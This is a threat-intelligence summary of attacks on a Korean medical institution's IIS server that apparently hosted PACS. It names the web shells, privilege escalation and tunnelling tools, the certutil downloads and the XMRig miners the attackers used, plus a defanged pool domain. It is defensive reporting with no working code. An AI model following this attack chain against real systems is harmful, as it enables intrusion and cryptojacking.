Recent attacks against a Korean medical institution’s Windows IIS server, where the attackers used unpatched vulnerabilities or subpar server management to install coin miners, are evidence that threat actors are targeting vulnerable web servers.
The targeted server’s path names suggest a Picture Archiving and Communication System (PACS) was present, indicating attackers may be targeting specific software installations on medical institution servers, which highlights the importance of keeping web servers patched and securely managed to prevent unauthorized access and malicious software installations.
An attack targeted a web server potentially containing a PACS system, a medical image management application. The server experienced two separate web shell upload attempts, likely due to PACS vulnerabilities or a security misconfiguration.
Evidence suggests two Chinese-speaking threat actors were involved, based on the tools used (Cpolar, RingQ) and accompanying Chinese annotations, which aligns with trends of Chinese-speaking actors targeting vulnerable Korean web servers.
They exploited a web server vulnerability to upload web shells (Chopper, Behinder) and then executed commands to gather system information (whoami, ipconfig, etc.) Next, privilege escalation tool BadPotato and tunneling tool Cpolar were installed.
Cpolar likely indicates a Chinese attacker due to its preference over Ngrok, and the CoinMiner downloader script (1.bat) with Chinese annotations was deployed, along with CoinMiner itself, which likely establishes persistence and automates CoinMiner download and installation.
It leveraged a downloaded malware package to install not only the XMRig cryptominer but also a collection of malicious tools. Web shells like Caidao and ASPXspy provided remote access, while privilege escalation tools like GodPotato and PrintNotifyPotato aided in gaining administrative control.
Using port forwarding tools (Frpc, Lcx) and user account creation malware (useradd.exe) made the attacker persistent and made it easier for them to get in again, and then set up the XMRig miner to connect to the pool “sinmaxinter[.]top:7005”.
The attacker leveraged initial web shell access (Godzilla, Chopper, and Behinder) to gather system information (whoami, systeminfo, and netstat) and then deployed Certutil to download further tools.
These included tools for gaining more privileges (GodPotato, PrintNotifyPotato, and the CVE-2021-1732 exploit), tools for exploring networks (Fscan and remote shell), a tool for communicating (Netcat), and a Chinese-language post-exploitation agent (Ladon) that could scan, gain more privileges, steal credentials, and set up reverse shells.
According to ASEC, attackers used the Chinese-linked injector tool RingQ to deliver encrypted malware (“main.txt”) that bypassed file-based detection.
Finally, they deployed an ASPX downloader that fetched and ran a memory-resident XMRig CoinMiner on the compromised system, where the CoinMiner connected to a pool of IP addresses for cryptocurrency mining.